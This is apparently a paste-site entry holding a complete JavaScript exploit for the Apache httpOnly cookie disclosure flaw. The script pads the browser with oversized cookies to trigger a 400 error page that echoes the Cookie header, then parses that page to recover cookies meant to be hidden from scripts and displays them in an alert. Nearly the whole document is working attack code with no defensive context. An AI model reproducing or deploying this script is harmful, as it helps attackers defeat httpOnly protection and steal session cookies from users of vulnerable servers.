Apache httpOnly Cookie Disclosure


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:18 p.m.

FORMAT: Text only

SIZE: 2.0 kB

HITS: 2426

  1. // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
  2. // Most browsers limit cookies to 4k characters, so we need multiple
  3. function setCookies (good) {
  4. // Construct string for cookie value
  5. var str = "";
  6. for (var i=0; i< 819; i++) {
  7. str += "x";
  8. }
  9. // Set cookies
  10. for (i = 0; i < 10; i++) {
  11. // Expire evil cookie
  12. if (good) {
  13. var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
  14. }
  15. // Set evil cookie
  16. else {
  17. var cookie = "xss"+i+"="+str+";path=/";
  18. }
  19. document.cookie = cookie;
  20. }
  21. }
  22. function makeRequest() {
  23. setCookies();
  24. function parseCookies () {
  25. var cookie_dict = {};
  26. // Only react on 400 status
  27. if (xhr.readyState === 4 && xhr.status === 400) {
  28. // Replace newlines and match <pre> content
  29. var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
  30. if (content.length) {
  31. // Remove Cookie: prefix
  32. content = content[1].replace("Cookie: ", "");
  33. var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
  34. // Add cookies to object
  35. for (var i=0; i<cookies.length; i++) {
  36. var s_c = cookies[i].split('=',2);
  37. cookie_dict[s_c[0]] = s_c[1];
  38. }
  39. }
  40. // Unset malicious cookies
  41. setCookies(true);
  42. alert(JSON.stringify(cookie_dict));
  43. }
  44. }
  45. // Make XHR request
  46. var xhr = new XMLHttpRequest();
  47. xhr.onreadystatechange = parseCookies;
  48. xhr.open("GET", "/", true);
  49. xhr.send(null);
  50. }
  51. makeRequest();

comments powered by Disqus